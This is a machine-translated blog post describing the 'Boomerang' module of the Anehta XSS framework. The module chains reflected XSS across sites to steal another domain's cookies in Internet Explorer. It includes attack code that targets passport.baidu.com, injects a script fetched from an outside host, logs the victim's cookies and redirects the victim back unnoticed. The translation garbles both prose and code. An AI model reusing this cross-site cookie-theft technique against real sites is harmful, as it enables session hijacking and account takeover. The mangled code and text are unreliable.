Anehta -- Boomerang (rollback): how to convert reflected XSS into persistent XSS: on cross-origin cookie acquisition

Author:Thorn

AnehtaThere are many creative designs,Boomerang,Return ModuleIs one of them.

The role of the rollback module isObtain local cookies across domains.

Boomerang ModuleDedicatedFor IEDesigned. You can use the xcookie module for Firefox, which will be discussed later.

Boomerang'sWorking Principle: We know that attackers can use JavaScript or other scripts to control browser behavior after the browser is attacked by XSS. At this time, if weForce the browser to access a page with the XSS vulnerability on site B, You can continue to use XSS_ B on Site B to control the user's browser behavior. Then, the whole process is combined with a simple representation as follows:

Victim Browser ---> site A, XSS_A ---- redirect to ----> Site B, XSS_ B ----- redirect somewhere ---> .....

However, for IE, it is difficult to obtain the cookie of Site B through XSS_ B. The difficulty lies in whether the request sent from site A carries the local cookie.

We know that in IE,Iframe, imgAnd so on. You need to use methods such as window. open that do not intercept cookies, but window. open will be blocked by IE, so I used it in boomerang.Form submission,Construct A form, submit it to site B, then import an xss B from Site B, obtain the cookie, submit it through the form, and jump back to the original Site.

If XSS_ B is used on Site B and the page is redirected back to Site A, it is A simple and deceptive flash for users.

This process can be described as follows:

In IE, jump to Site B and then jump back to A. The cookie of Site B has been obtained in the middle.Just as if I threw it out and beat B.So I name this module as the return module:Boomerang!

The implementation code is as follows:

//////////////////////////////////////// ////////////////////
Var target_domain = "passport.baidu.com ";
VarTarget="Http://passport.baidu.com /? Getmypass & username = "]; document. write (<script src = http://www.secwiki.com/anehta/feed.js> </script> );//";

// Front page
VarOrg_url="Http://www.secwiki.com/anehta/demo.html ";
Var org_domain = "www.secwiki.com ";

// If it is the current page, submit it to the target
If ($ d. domain = org_domain){
If (anehta. dom. checkCookie ("boomerang") = false ){
// Flag the cookie only once
Anehta. dom. addCookie ("boomerang", "x ");

SetTimeout (function (){
// Alert (target );
Try {
Anehta.net. postForm (target );
} Catch (e ){
// Alert (e );
}
},
50);
}
}

// If it is the target site, redirect back to the previous page
If ($ d. domain = target_domain){

// The clx module is too slow.
Anehta. logger. logCookie ();// Record cookie
SetTimeout (function (){
// Bounce back to the original page.
Anehta.net. postForm (org_url );
},
50 );
}

It can be noted that the time spent on Site B is only50 msIt is very short, and what we want to do has been done.

All that is required is that there is an XSS on the B station, and there are no restrictions on the types. That is to say,Whether reflected XSS or persistent XSS, we can do our work well..

In the past, the reflected XSS may be a chicken ribs, but through the return module, we have become useless!

In Anehta demo page, added a demo for the rollback handler. (Note that in IE, when the rollback handler is used, site B is too late to add a watermark, so the record is saved in noWaterMark)

Http://www.secwiki.com/anehta/demo.html

BackgroundHttp://www.secwiki.com/anehta/admin.php